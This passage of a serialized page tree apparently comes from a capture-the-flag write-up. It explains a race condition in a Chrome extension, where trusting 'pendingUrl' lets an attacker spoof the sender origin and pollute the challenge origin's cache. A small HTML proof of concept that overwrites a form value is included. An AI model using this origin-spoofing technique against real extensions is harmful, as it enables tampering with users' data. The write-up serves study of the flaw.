},{"type":33,"tag":128,"props":18634,"children":18635},{"class":130,"line":1152},[18636],{"type":33,"tag":128,"props":18637,"children":18638},{"emptyLinePlaceholder":896},[18639],{"type":38,"value":899},{"type":33,"tag":128,"props":18641,"children":18642},{"class":130,"line":1165},[18643,18647,18651,18655,18659,18663,18667,18671,18675,18679,18683,18687,18691,18695,18699,18703],{"type":33,"tag":128,"props":18644,"children":18645},{"style":306},[18646],{"type":38,"value":13775},{"type":33,"tag":128,"props":18648,"children":18649},{"style":312},[18650],{"type":38,"value":215},{"type":33,"tag":128,"props":18652,"children":18653},{"style":306},[18654],{"type":38,"value":13784},{"type":33,"tag":128,"props":18656,"children":18657},{"style":312},[18658],{"type":38,"value":215},{"type":33,"tag":128,"props":18660,"children":18661},{"style":306},[18662],{"type":38,"value":13793},{"type":33,"tag":128,"props":18664,"children":18665},{"style":312},[18666],{"type":38,"value":215},{"type":33,"tag":128,"props":18668,"children":18669},{"style":135},[18670],{"type":38,"value":13802},{"type":33,"tag":128,"props":18672,"children":18673},{"style":312},[18674],{"type":38,"value":13071},{"type":33,"tag":128,"props":18676,"children":18677},{"style":306},[18678],{"type":38,"value":13811},{"type":33,"tag":128,"props":18680,"children":18681},{"style":312},[18682],{"type":38,"value":5584},{"type":33,"tag":128,"props":18684,"children":18685},{"style":306},[18686],{"type":38,"value":13820},{"type":33,"tag":128,"props":18688,"children":18689},{"style":312},[18690],{"type":38,"value":5584},{"type":33,"tag":128,"props":18692,"children":18693},{"style":306},[18694],{"type":38,"value":13829},{"type":33,"tag":128,"props":18696,"children":18697},{"style":312},[18698],{"type":38,"value":2966},{"type":33,"tag":128,"props":18700,"children":18701},{"style":312},[18702],{"type":38,"value":5625},{"type":33,"tag":128,"props":18704,"children":18705},{"style":312},[18706],{"type":38,"value":762},{"type":33,"tag":128,"props":18708,"children":18709},{"class":130,"line":1177},[18710,18714,18718,18722,18726,18730,18734],{"type":33,"tag":128,"props":18711,"children":18712},{"style":300},[18713],{"type":38,"value":13849},{"type":33,"tag":128,"props":18715,"children":18716},{"style":437},[18717],{"type":38,"value":13066},{"type":33,"tag":128,"props":18719,"children":18720},{"style":312},[18721],{"type":38,"value":5566},{"type":33,"tag":128,"props":18723,"children":18724},{"style":300},[18725],{"type":38,"value":13862},{"type":33,"tag":128,"props":18727,"children":18728},{"style":312},[18729],{"type":38,"value":13259},{"type":33,"tag":128,"props":18731,"children":18732},{"style":312},[18733],{"type":38,"value":5625},{"type":33,"tag":128,"props":18735,"children":18736},{"style":312},[18737],{"type":38,"value":762},{"type":33,"tag":128,"props":18739,"children":18740},{"class":130,"line":1189},[18741,18745,18749,18753,18757,18761,18765,18769,18773,18777,18781,18785,18789,18793,18797,18801,18805,18809,18813,18817],{"type":33,"tag":128,"props":18742,"children":18743},{"style":300},[18744],{"type":38,"value":5696},{"type":33,"tag":128,"props":18746,"children":18747},{"style":306},[18748],{"type":38,"value":13886},{"type":33,"tag":128,"props":18750,"children":18751},{"style":312},[18752],{"type":38,"value":5657},{"type":33,"tag":128,"props":18754,"children":18755},{"style":300},[18756],{"type":38,"value":13061},{"type":33,"tag":128,"props":18758,"children":18759},{"style":135},[18760],{"type":38,"value":13899},{"type":33,"tag":128,"props":18762,"children":18763},{"style":312},[18764],{"type":38,"value":5566},{"type":33,"tag":128,"props":18766,"children":18767},{"style":306},[18768],{"type":38,"value":13908},{"type":33,"tag":128,"props":18770,"children":18771},{"style":312},[18772],{"type":38,"value":215},{"type":33,"tag":128,"props":18774,"children":18775},{"style":306},[18776],{"type":38,"value":13917},{"type":33,"tag":128,"props":18778,"children":18779},{"style":312},[18780],{"type":38,"value":215},{"type":33,"tag":128,"props":18782,"children":18783},{"style":306},[18784],{"type":38,"value":13926},{"type":33,"tag":128,"props":18786,"children":18787},{"style":300},[18788],{"type":38,"value":13931},{"type":33,"tag":128,"props":18790,"children":18791},{"style":306},[18792],{"type":38,"value":13820},{"type":33,"tag":128,"props":18794,"children":18795},{"style":312},[18796],{"type":38,"value":215},{"type":33,"tag":128,"props":18798,"children":18799},{"style":306},[18800],{"type":38,"value":13917},{"type":33,"tag":128,"props":18802,"children":18803},{"style":312},[18804],{"type":38,"value":215},{"type":33,"tag":128,"props":18806,"children":18807},{"style":306},[18808],{"type":38,"value":13952},{"type":33,"tag":128,"props":18810,"children":18811},{"style":312},[18812],{"type":38,"value":6700},{"type":33,"tag":128,"props":18814,"children":18815},{"style":306},[18816],{"type":38,"value":13961},{"type":33,"tag":128,"props":18818,"children":18819},{"style":312},[18820],{"type":38,"value":5676},{"type":33,"tag":128,"props":18822,"children":18823},{"class":130,"line":1202},[18824,18828,18832,18836,18840,18844,18848,18852,18856,18860],{"type":33,"tag":128,"props":18825,"children":18826},{"style":306},[18827],{"type":38,"value":6880},{"type":33,"tag":128,"props":18829,"children":18830},{"style":312},[18831],{"type":38,"value":215},{"type":33,"tag":128,"props":18833,"children":18834},{"style":135},[18835],{"type":38,"value":13157},{"type":33,"tag":128,"props":18837,"children":18838},{"style":312},[18839],{"type":38,"value":5566},{"type":33,"tag":128,"props":18841,"children":18842},{"style":676},[18843],{"type":38,"value":669},{"type":33,"tag":128,"props":18845,"children":18846},{"style":140},[18847],{"type":38,"value":13993},{"type":33,"tag":128,"props":18849,"children":18850},{"style":676},[18851],{"type":38,"value":669},{"type":33,"tag":128,"props":18853,"children":18854},{"style":312},[18855],{"type":38,"value":5584},{"type":33,"tag":128,"props":18857,"children":18858},{"style":306},[18859],{"type":38,"value":13886},{"type":33,"tag":128,"props":18861,"children":18862},{"style":312},[18863],{"type":38,"value":5815},{"type":33,"tag":128,"props":18865,"children":18866},{"class":130,"line":1214},[18867,18871,18875,18879,18883,18887,18891,18895,18899,18903],{"type":33,"tag":128,"props":18868,"children":18869},{"style":306},[18870],{"type":38,"value":6880},{"type":33,"tag":128,"props":18872,"children":18873},{"style":312},[18874],{"type":38,"value":215},{"type":33,"tag":128,"props":18876,"children":18877},{"style":135},[18878],{"type":38,"value":13157},{"type":33,"tag":128,"props":18880,"children":18881},{"style":312},[18882],{"type":38,"value":5566},{"type":33,"tag":128,"props":18884,"children":18885},{"style":676},[18886],{"type":38,"value":669},{"type":33,"tag":128,"props":18888,"children":18889},{"style":140},[18890],{"type":38,"value":14037},{"type":33,"tag":128,"props":18892,"children":18893},{"style":676},[18894],{"type":38,"value":669},{"type":33,"tag":128,"props":18896,"children":18897},{"style":312},[18898],{"type":38,"value":5584},{"type":33,"tag":128,"props":18900,"children":18901},{"style":306},[18902],{"type":38,"value":14050},{"type":33,"tag":128,"props":18904,"children":18905},{"style":312},[18906],{"type":38,"value":5815},{"type":33,"tag":128,"props":18908,"children":18909},{"class":130,"line":1226},[18910,18914,18918,18922,18926,18930,18934,18938,18942,18946,18950],{"type":33,"tag":128,"props":18911,"children":18912},{"style":1576},[18913],{"type":38,"value":6625},{"type":33,"tag":128,"props":18915,"children":18916},{"style":312},[18917],{"type":38,"value":2852},{"type":33,"tag":128,"props":18919,"children":18920},{"style":306},[18921],{"type":38,"value":13811},{"type":33,"tag":128,"props":18923,"children":18924},{"style":312},[18925],{"type":38,"value":215},{"type":33,"tag":128,"props":18927,"children":18928},{"style":306},[18929],{"type":38,"value":14078},{"type":33,"tag":128,"props":18931,"children":18932},{"style":300},[18933],{"type":38,"value":13595},{"type":33,"tag":128,"props":18935,"children":18936},{"style":676},[18937],{"type":38,"value":679},{"type":33,"tag":128,"props":18939,"children":18940},{"style":140},[18941],{"type":38,"value":14091},{"type":33,"tag":128,"props":18943,"children":18944},{"style":676},[18945],{"type":38,"value":669},{"type":33,"tag":128,"props":18947,"children":18948},{"style":312},[18949],{"type":38,"value":2966},{"type":33,"tag":128,"props":18951,"children":18952},{"style":312},[18953],{"type":38,"value":762},{"type":33,"tag":128,"props":18955,"children":18956},{"class":130,"line":1239},[18957,18961,18965,18969,18973,18977,18981,18985,18989,18993,18997,19001,19005,19009,19013,19017],{"type":33,"tag":128,"props":18958,"children":18959},{"style":135},[18960],{"type":38,"value":14111},{"type":33,"tag":128,"props":18962,"children":18963},{"style":312},[18964],{"type":38,"value":5566},{"type":33,"tag":128,"props":18966,"children":18967},{"style":306},[18968],{"type":38,"value":13811},{"type":33,"tag":128,"props":18970,"children":18971},{"style":312},[18972],{"type":38,"value":215},{"type":33,"tag":128,"props":18974,"children":18975},{"style":306},[18976],{"type":38,"value":11139},{"type":33,"tag":128,"props":18978,"children":18979},{"style":312},[18980],{"type":38,"value":215},{"type":33,"tag":128,"props":18982,"children":18983},{"style":306},[18984],{"type":38,"value":13022},{"type":33,"tag":128,"props":18986,"children":18987},{"style":312},[18988],{"type":38,"value":5584},{"type":33,"tag":128,"props":18990,"children":18991},{"style":306},[18992],{"type":38,"value":14050},{"type":33,"tag":128,"props":18994,"children":18995},{"style":312},[18996],{"type":38,"value":215},{"type":33,"tag":128,"props":18998,"children":18999},{"style":306},[19000],{"type":38,"value":11139},{"type":33,"tag":128,"props":19002,"children":19003},{"style":312},[19004],{"type":38,"value":215},{"type":33,"tag":128,"props":19006,"children":19007},{"style":306},[19008],{"type":38,"value":14160},{"type":33,"tag":128,"props":19010,"children":19011},{"style":312},[19012],{"type":38,"value":5584},{"type":33,"tag":128,"props":19014,"children":19015},{"style":306},[19016],{"type":38,"value":13886},{"type":33,"tag":128,"props":19018,"children":19019},{"style":312},[19020],{"type":38,"value":2427},{"type":33,"tag":128,"props":19022,"children":19023},{"class":130,"line":1251},[19024,19028,19032,19036,19040,19044,19048,19052,19056],{"type":33,"tag":128,"props":19025,"children":19026},{"style":312},[19027],{"type":38,"value":14180},{"type":33,"tag":128,"props":19029,"children":19030},{"style":135},[19031],{"type":38,"value":14185},{"type":33,"tag":128,"props":19033,"children":19034},{"style":312},[19035],{"type":38,"value":5566},{"type":33,"tag":128,"props":19037,"children":19038},{"style":306},[19039],{"type":38,"value":14194},{"type":33,"tag":128,"props":19041,"children":19042},{"style":312},[19043],{"type":38,"value":5625},{"type":33,"tag":128,"props":19045,"children":19046},{"style":135},[19047],{"type":38,"value":13829},{"type":33,"tag":128,"props":19049,"children":19050},{"style":312},[19051],{"type":38,"value":5566},{"type":33,"tag":128,"props":19053,"children":19054},{"style":306},[19055],{"type":38,"value":14194},{"type":33,"tag":128,"props":19057,"children":19058},{"style":312},[19059],{"type":38,"value":2459},{"type":33,"tag":128,"props":19061,"children":19062},{"class":130,"line":1263},[19063,19067,19071,19075,19079,19083,19087,19091,19095],{"type":33,"tag":128,"props":19064,"children":19065},{"style":312},[19066],{"type":38,"value":14180},{"type":33,"tag":128,"props":19068,"children":19069},{"style":135},[19070],{"type":38,"value":14226},{"type":33,"tag":128,"props":19072,"children":19073},{"style":312},[19074],{"type":38,"value":5566},{"type":33,"tag":128,"props":19076,"children":19077},{"style":306},[19078],{"type":38,"value":6889},{"type":33,"tag":128,"props":19080,"children":19081},{"style":312},[19082],{"type":38,"value":5625},{"type":33,"tag":128,"props":19084,"children":19085},{"style":135},[19086],{"type":38,"value":13829},{"type":33,"tag":128,"props":19088,"children":19089},{"style":312},[19090],{"type":38,"value":5836},{"type":33,"tag":128,"props":19092,"children":19093},{"style":306},[19094],{"type":38,"value":14251},{"type":33,"tag":128,"props":19096,"children":19097},{"style":312},[19098],{"type":38,"value":14256},{"type":33,"tag":128,"props":19100,"children":19101},{"class":130,"line":1276},[19102,19106,19110,19114,19118,19122,19126,19130,19134,19138,19142,19146,19150],{"type":33,"tag":128,"props":19103,"children":19104},{"style":312},[19105],{"type":38,"value":14264},{"type":33,"tag":128,"props":19107,"children":19108},{"style":1576},[19109],{"type":38,"value":14269},{"type":33,"tag":128,"props":19111,"children":19112},{"style":1576},[19113],{"type":38,"value":14274},{"type":33,"tag":128,"props":19115,"children":19116},{"style":312},[19117],{"type":38,"value":2852},{"type":33,"tag":128,"props":19119,"children":19120},{"style":306},[19121],{"type":38,"value":13811},{"type":33,"tag":128,"props":19123,"children":19124},{"style":312},[19125],{"type":38,"value":215},{"type":33,"tag":128,"props":19127,"children":19128},{"style":306},[19129],{"type":38,"value":14078},{"type":33,"tag":128,"props":19131,"children":19132},{"style":300},[19133],{"type":38,"value":13595},{"type":33,"tag":128,"props":19135,"children":19136},{"style":676},[19137],{"type":38,"value":679},{"type":33,"tag":128,"props":19139,"children":19140},{"style":140},[19141],{"type":38,"value":14303},{"type":33,"tag":128,"props":19143,"children":19144},{"style":676},[19145],{"type":38,"value":669},{"type":33,"tag":128,"props":19147,"children":19148},{"style":312},[19149],{"type":38,"value":2966},{"type":33,"tag":128,"props":19151,"children":19152},{"style":312},[19153],{"type":38,"value":762},{"type":33,"tag":128,"props":19155,"children":19156},{"class":130,"line":1288},[19157,19161,19165,19169,19173,19177,19181,19185,19189,19193],{"type":33,"tag":128,"props":19158,"children":19159},{"style":135},[19160],{"type":38,"value":14323},{"type":33,"tag":128,"props":19162,"children":19163},{"style":312},[19164],{"type":38,"value":5566},{"type":33,"tag":128,"props":19166,"children":19167},{"style":306},[19168],{"type":38,"value":13811},{"type":33,"tag":128,"props":19170,"children":19171},{"style":312},[19172],{"type":38,"value":215},{"type":33,"tag":128,"props":19174,"children":19175},{"style":306},[19176],{"type":38,"value":11139},{"type":33,"tag":128,"props":19178,"children":19179},{"style":312},[19180],{"type":38,"value":215},{"type":33,"tag":128,"props":19182,"children":19183},{"style":306},[19184],{"type":38,"value":13022},{"type":33,"tag":128,"props":19186,"children":19187},{"style":312},[19188],{"type":38,"value":5584},{"type":33,"tag":128,"props":19190,"children":19191},{"style":306},[19192],{"type":38,"value":13886},{"type":33,"tag":128,"props":19194,"children":19195},{"style":312},[19196],{"type":38,"value":2427},{"type":33,"tag":128,"props":19198,"children":19199},{"class":130,"line":1300},[19200,19204,19208,19212,19216,19220,19224,19228,19232],{"type":33,"tag":128,"props":19201,"children":19202},{"style":312},[19203],{"type":38,"value":14180},{"type":33,"tag":128,"props":19205,"children":19206},{"style":135},[19207],{"type":38,"value":14185},{"type":33,"tag":128,"props":19209,"children":19210},{"style":312},[19211],{"type":38,"value":5566},{"type":33,"tag":128,"props":19213,"children":19214},{"style":306},[19215],{"type":38,"value":14194},{"type":33,"tag":128,"props":19217,"children":19218},{"style":312},[19219],{"type":38,"value":5625},{"type":33,"tag":128,"props":19221,"children":19222},{"style":135},[19223],{"type":38,"value":13829},{"type":33,"tag":128,"props":19225,"children":19226},{"style":312},[19227],{"type":38,"value":5566},{"type":33,"tag":128,"props":19229,"children":19230},{"style":306},[19231],{"type":38,"value":14194},{"type":33,"tag":128,"props":19233,"children":19234},{"style":312},[19235],{"type":38,"value":2459},{"type":33,"tag":128,"props":19237,"children":19238},{"class":130,"line":1313},[19239,19243,19247,19251,19255,19259,19263,19267,19271],{"type":33,"tag":128,"props":19240,"children":19241},{"style":312},[19242],{"type":38,"value":14180},{"type":33,"tag":128,"props":19244,"children":19245},{"style":135},[19246],{"type":38,"value":14226},{"type":33,"tag":128,"props":19248,"children":19249},{"style":312},[19250],{"type":38,"value":5566},{"type":33,"tag":128,"props":19252,"children":19253},{"style":306},[19254],{"type":38,"value":6889},{"type":33,"tag":128,"props":19256,"children":19257},{"style":312},[19258],{"type":38,"value":5625},{"type":33,"tag":128,"props":19260,"children":19261},{"style":135},[19262],{"type":38,"value":13829},{"type":33,"tag":128,"props":19264,"children":19265},{"style":312},[19266],{"type":38,"value":5836},{"type":33,"tag":128,"props":19268,"children":19269},{"style":306},[19270],{"type":38,"value":14251},{"type":33,"tag":128,"props":19272,"children":19273},{"style":312},[19274],{"type":38,"value":14256},{"type":33,"tag":128,"props":19276,"children":19277},{"class":130,"line":1327},[19278],{"type":33,"tag":128,"props":19279,"children":19280},{"style":312},[19281],{"type":38,"value":6760},{"type":33,"tag":128,"props":19283,"children":19284},{"class":130,"line":11196},[19285],{"type":33,"tag":128,"props":19286,"children":19287},{"style":312},[19288],{"type":38,"value":13321},{"type":33,"tag":128,"props":19290,"children":19291},{"class":130,"line":11204},[19292,19296,19300],{"type":33,"tag":128,"props":19293,"children":19294},{"style":1576},[19295],{"type":38,"value":13056},{"type":33,"tag":128,"props":19297,"children":19298},{"style":1576},[19299],{"type":38,"value":5850},{"type":33,"tag":128,"props":19301,"children":19302},{"style":312},[19303],{"type":38,"value":5676},{"type":33,"tag":128,"props":19305,"children":19306},{"class":130,"line":11213},[19307],{"type":33,"tag":128,"props":19308,"children":19309},{"style":312},[19310],{"type":38,"value":5902},{"type":33,"tag":40,"props":19312,"children":19314},{"id":19313},"race-condition-to-chrome-cache-pollution",[19315],{"type":38,"value":12046},{"type":33,"tag":47,"props":19317,"children":19318},{},[19319],{"type":38,"value":19320},"The first part of the challenge concerns a race condition in the background script.",{"type":33,"tag":47,"props":19322,"children":19323},{},[19324],{"type":38,"value":19325},"If we focus on the beginning of the background script, we can see that the sender_origin variable is defined in this way:",{"type":33,"tag":114,"props":19327,"children":19328},{"lang":5526},[19329],{"type":33,"tag":119,"props":19330,"children":19332},{"className":5530,"code":19331,"language":5526,"meta":8,"style":8},"const sender_origin = new URL(sender.tab.pendingUrl ?? sender.tab.url).origin;\n",[19333],{"type":33,"tag":105,"props":19334,"children":19335},{"__ignoreMap":8},[19336],{"type":33,"tag":128,"props":19337,"children":19338},{"class":130,"line":131},[19339,19343,19347,19351,19355,19359,19363,19367,19371,19375,19379,19383,19387,19391,19395,19399,19403,19407,19411,19415],{"type":33,"tag":128,"props":19340,"children":19341},{"style":300},[19342],{"type":38,"value":15973},{"type":33,"tag":128,"props":19344,"children":19345},{"style":306},[19346],{"type":38,"value":13886},{"type":33,"tag":128,"props":19348,"children":19349},{"style":312},[19350],{"type":38,"value":5657},{"type":33,"tag":128,"props":19352,"children":19353},{"style":300},[19354],{"type":38,"value":13061},{"type":33,"tag":128,"props":19356,"children":19357},{"style":135},[19358],{"type":38,"value":13899},{"type":33,"tag":128,"props":19360,"children":19361},{"style":312},[19362],{"type":38,"value":5566},{"type":33,"tag":128,"props":19364,"children":19365},{"style":306},[19366],{"type":38,"value":13908},{"type":33,"tag":128,"props":19368,"children":19369},{"style":312},[19370],{"type":38,"value":215},{"type":33,"tag":128,"props":19372,"children":19373},{"style":306},[19374],{"type":38,"value":13917},{"type":33,"tag":128,"props":19376,"children":19377},{"style":312},[19378],{"type":38,"value":215},{"type":33,"tag":128,"props":19380,"children":19381},{"style":306},[19382],{"type":38,"value":13926},{"type":33,"tag":128,"props":19384,"children":19385},{"style":300},[19386],{"type":38,"value":13931},{"type":33,"tag":128,"props":19388,"children":19389},{"style":306},[19390],{"type":38,"value":13820},{"type":33,"tag":128,"props":19392,"children":19393},{"style":312},[19394],{"type":38,"value":215},{"type":33,"tag":128,"props":19396,"children":19397},{"style":306},[19398],{"type":38,"value":13917},{"type":33,"tag":128,"props":19400,"children":19401},{"style":312},[19402],{"type":38,"value":215},{"type":33,"tag":128,"props":19404,"children":19405},{"style":306},[19406],{"type":38,"value":13952},{"type":33,"tag":128,"props":19408,"children":19409},{"style":312},[19410],{"type":38,"value":6700},{"type":33,"tag":128,"props":19412,"children":19413},{"style":306},[19414],{"type":38,"value":13961},{"type":33,"tag":128,"props":19416,"children":19417},{"style":312},[19418],{"type":38,"value":5676},{"type":33,"tag":47,"props":19420,"children":19421},{},[19422],{"type":38,"value":19423},"The pendingUrl property in the Chrome Sender Object (found in the chrome.runtime API) is available in Chrome extensions to indicate a URL that a tab is in the process of navigating to, but has not yet fully loaded.",{"type":33,"tag":47,"props":19425,"children":19426},{},[19427,19429,19435],{"type":38,"value":19428},"This definition is problematic because it will take into account the pendingURL to define the value of the origin that will be used. It is therefore possible to arbitrarily pollute the chrome cache of an origin. We must therefore use a race condition for this. If you are not comfortable with the term Race condition, I advise you to check out the write-up of the ",{"type":33,"tag":53,"props":19430,"children":19432},{"href":19431},"/writeups/phantom-feed#race-condition",[19433],{"type":38,"value":19434},"Phantom-feed challenge",{"type":38,"value":215},{"type":33,"tag":47,"props":19437,"children":19438},{},[19439,19441,19447,19449],{"type":38,"value":19440},"With this code, we can demonstrate that it is possible to pollute the origin: ",{"type":33,"tag":105,"props":19442,"children":19444},{"className":19443},[],[19445],{"type":38,"value":19446},"shikanoko.challenge",{"type":38,"value":19448}," by updating the form value to: ",{"type":33,"tag":105,"props":19450,"children":19452},{"className":19451},[],[19453],{"type":38,"value":19454},"PWNED shikanoko nokonoko koshitantan",{"type":33,"tag":114,"props":19456,"children":19457},{"lang":5929},[19458],{"type":33,"tag":119,"props":19459,"children":19461},{"className":5933,"code":19460,"language":5929,"meta":8,"style":8},"\u003Chtml>\n \u003Cbody>\n \u003Ch1>Test poc\u003C/h1>\n \u003Cinput id=\"html\" type=\"text\" name=\"html\" placeholder=\"Enter HTML content\">\n \u003C/body>\n \u003Cscript>\n (async () => {\n const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms));\n await sleep(1000);\n document.location = \"http://shikanoko.challenge:8547/\";\n html_elm = document.getElementById(\"html\");\n html_elm.value = \"PWNED shikanoko nokonoko koshitantan\";\n let event = new Event('change');\n html_elm.dispatchEvent(event);\n })();\n \u003C/script>\n\u003C/html> \n",[19462],{"type":33,"tag":105,"props":19463,"children":19464},{"__ignoreMap":8},[19465,19480,19495,19527,19622,19637,19652,19676,19756,19780,19817,19862,19897,19942,19970,19978,19993],{"type":33,"tag":128,"props":19466,"children":19467},{"class":130,"line":131},[19468,19472,19476],{"type":33,"tag":128,"props":19469,"children":19470},{"style":312},[19471],{"type":38,"value":5977},{"type":33,"tag":128,"props":19473,"children":19474},{"style":1576},[19475],{"type":38,"value":5929},{"type":33,"tag":128,"props":19477,"children":19478},{"style":312},[19479],{"type":38,"value":6097},{"type":33,"tag":128,"props":19481,"children":19482},{"class":130,"line":362},[19483,19487,19491],{"type":33,"tag":128,"props":19484,"children":19485},{"style":312},[19486],{"type":38,"value":6105},{"type":33,"tag":128,"props":19488,"children":19489},{"style":1576},[19490],{"type":38,"value":5671},{"type":33,"tag":128,"props":19492,"children":19493},{"style":312},[19494],{"type":38,"value":6097},{"type":33,"tag":128,"props":19496,"children":19497},{"class":130,"line":403},[19498,19502,19506,19510,19515,19519,19523],{"type":33,"tag":128,"props":19499,"children":19500},{"style":312},[19501],{"type":38,"value":14877},{"type":33,"tag":128,"props":19503,"children":19504},{"style":1576},[19505],{"type":38,"value":34},{"type":33,"tag":128,"props":19507,"children":19508},{"style":312},[19509],{"type":38,"value":6054},{"type":33,"tag":128,"props":19511,"children":19512},{"style":323},[19513],{"type":38,"value":19514},"Test poc",{"type":33,"tag":128,"props":19516,"children":19517},{"style":312},[19518],{"type":38,"value":6190},{"type":33,"tag":128,"props":19520,"children":19521},{"style":1576},[19522],{"type":38,"value":34},{"type":33,"tag":128,"props":19524,"children":19525},{"style":312},[19526],{"type":38,"value":6097},{"type":33,"tag":128,"props":19528,"children":19529},{"class":130,"line":739},[19530,19534,19538,19542,19546,19550,19554,19558,19562,19566,19570,19574,19578,19582,19586,19590,19594,19598,19602,19606,19610,19614,19618],{"type":33,"tag":128,"props":19531,"children":19532},{"style":312},[19533],{"type":38,"value":14877},{"type":33,"tag":128,"props":19535,"children":19536},{"style":1576},[19537],{"type":38,"value":14882},{"type":33,"tag":128,"props":19539,"children":19540},{"style":306},[19541],{"type":38,"value":5987},{"type":33,"tag":128,"props":19543,"children":19544},{"style":312},[19545],{"type":38,"value":315},{"type":33,"tag":128,"props":19547,"children":19548},{"style":676},[19549],{"type":38,"value":669},{"type":33,"tag":128,"props":19551,"children":19552},{"style":140},[19553],{"type":38,"value":5929},{"type":33,"tag":128,"props":19555,"children":19556},{"style":676},[19557],{"type":38,"value":669},{"type":33,"tag":128,"props":19559,"children":19560},{"style":306},[19561],{"type":38,"value":14887},{"type":33,"tag":128,"props":19563,"children":19564},{"style":312},[19565],{"type":38,"value":315},{"type":33,"tag":128,"props":19567,"children":19568},{"style":676},[19569],{"type":38,"value":669},{"type":33,"tag":128,"props":19571,"children":19572},{"style":140},[19573],{"type":38,"value":38},{"type":33,"tag":128,"props":19575,"children":19576},{"style":676},[19577],{"type":38,"value":669},{"type":33,"tag":128,"props":19579,"children":19580},{"style":306},[19581],{"type":38,"value":14688},{"type":33,"tag":128,"props":19583,"children":19584},{"style":312},[19585],{"type":38,"value":315},{"type":33,"tag":128,"props":19587,"children":19588},{"style":676},[19589],{"type":38,"value":669},{"type":33,"tag":128,"props":19591,"children":19592},{"style":140},[19593],{"type":38,"value":5929},{"type":33,"tag":128,"props":19595,"children":19596},{"style":676},[19597],{"type":38,"value":669},{"type":33,"tag":128,"props":19599,"children":19600},{"style":306},[19601],{"type":38,"value":14928},{"type":33,"tag":128,"props":19603,"children":19604},{"style":312},[19605],{"type":38,"value":315},{"type":33,"tag":128,"props":19607,"children":19608},{"style":676},[19609],{"type":38,"value":669},{"type":33,"tag":128,"props":19611,"children":19612},{"style":140},[19613],{"type":38,"value":14941},{"type":33,"tag":128,"props":19615,"children":19616},{"style":676},[19617],{"type":38,"value":669},{"type":33,"tag":128,"props":19619,"children":19620},{"style":312},[19621],{"type":38,"value":6097},{"type":33,"tag":128,"props":19623,"children":19624},{"class":130,"line":765},[19625,19629,19633],{"type":33,"tag":128,"props":19626,"children":19627},{"style":312},[19628],{"type":38,"value":14993},{"type":33,"tag":128,"props":19630,"children":19631},{"style":1576},[19632],{"type":38,"value":5671},{"type":33,"tag":128,"props":19634,"children":19635},{"style":312},[19636],{"type":38,"value":6097},{"type":33,"tag":128,"props":19638,"children":19639},{"class":130,"line":804},[19640,19644,19648],{"type":33,"tag":128,"props":19641,"children":19642},{"style":312},[19643],{"type":38,"value":6105},{"type":33,"tag":128,"props":19645,"children":19646},{"style":1576},[19647],{"type":38,"value":15064},{"type":33,"tag":128,"props":19649,"children":19650},{"style":312},[19651],{"type":38,"value":6097},{"type":33,"tag":128,"props":19653,"children":19654},{"class":130,"line":839},[19655,19660,19664,19668,19672],{"type":33,"tag":128,"props":19656,"children":19657},{"style":312},[19658],{"type":38,"value":19659}," (",{"type":33,"tag":128,"props":19661,"children":19662},{"style":300},[19663],{"type":38,"value":13862},{"type":33,"tag":128,"props":19665,"children":19666},{"style":312},[19667],{"type":38,"value":13259},{"type":33,"tag":128,"props":19669,"children":19670},{"style":312},[19671],{"type":38,"value":5625},{"type":33,"tag":128,"props":19673,"children":19674},{"style":312},[19675],{"type":38,"value":762},{"type":33,"tag":128,"props":19677,"children":19678},{"class":130,"line":848},[19679,19684,19689,19693,19697,19702,19706,19710,19714,19718,19722,19726,19730,19735,19739,19743,19747,19752],{"type":33,"tag":128,"props":19680,"children":19681},{"style":300},[19682],{"type":38,"value":19683}," const",{"type":33,"tag":128,"props":19685,"children":19686},{"style":135},[19687],{"type":38,"value":19688}," sleep",{"type":33,"tag":128,"props":19690,"children":19691},{"style":312},[19692],{"type":38,"value":5657},{"type":33,"tag":128,"props":19694,"children":19695},{"style":312},[19696],{"type":38,"value":2852},{"type":33,"tag":128,"props":19698,"children":19699},{"style":306},[19700],{"type":38,"value":19701},"ms",{"type":33,"tag":128,"props":19703,"children":19704},{"style":312},[19705],{"type":38,"value":2966},{"type":33,"tag":128,"props":19707,"children":19708},{"style":312},[19709],{"type":38,"value":5625},{"type":33,"tag":128,"props":19711,"children":19712},{"style":300},[19713],{"type":38,"value":13061},{"type":33,"tag":128,"props":19715,"children":19716},{"style":437},[19717],{"type":38,"value":13066},{"type":33,"tag":128,"props":19719,"children":19720},{"style":312},[19721],{"type":38,"value":5566},{"type":33,"tag":128,"props":19723,"children":19724},{"style":306},[19725],{"type":38,"value":13076},{"type":33,"tag":128,"props":19727,"children":19728},{"style":312},[19729],{"type":38,"value":5625},{"type":33,"tag":128,"props":19731,"children":19732},{"style":135},[19733],{"type":38,"value":19734}," setTimeout",{"type":33,"tag":128,"props":19736,"children":19737},{"style":312},[19738],{"type":38,"value":5566},{"type":33,"tag":128,"props":19740,"children":19741},{"style":306},[19742],{"type":38,"value":13076},{"type":33,"tag":128,"props":19744,"children":19745},{"style":312},[19746],{"type":38,"value":5584},{"type":33,"tag":128,"props":19748,"children":19749},{"style":306},[19750],{"type":38,"value":19751}," ms",{"type":33,"tag":128,"props":19753,"children":19754},{"style":312},[19755],{"type":38,"value":9722},{"type":33,"tag":128,"props":19757,"children":19758},{"class":130,"line":976},[19759,19764,19768,19772,19776],{"type":33,"tag":128,"props":19760,"children":19761},{"style":1576},[19762],{"type":38,"value":19763}," await",{"type":33,"tag":128,"props":19765,"children":19766},{"style":135},[19767],{"type":38,"value":19688},{"type":33,"tag":128,"props":19769,"children":19770},{"style":312},[19771],{"type":38,"value":5566},{"type":33,"tag":128,"props":19773,"children":19774},{"style":523},[19775],{"type":38,"value":78},{"type":33,"tag":128,"props":19777,"children":19778},{"style":312},[19779],{"type":38,"value":5815},{"type":33,"tag":128,"props":19781,"children":19782},{"class":130,"line":988},[19783,19788,19792,19796,19800,19804,19809,19813],{"type":33,"tag":128,"props":19784,"children":19785},{"style":306},[19786],{"type":38,"value":19787}," 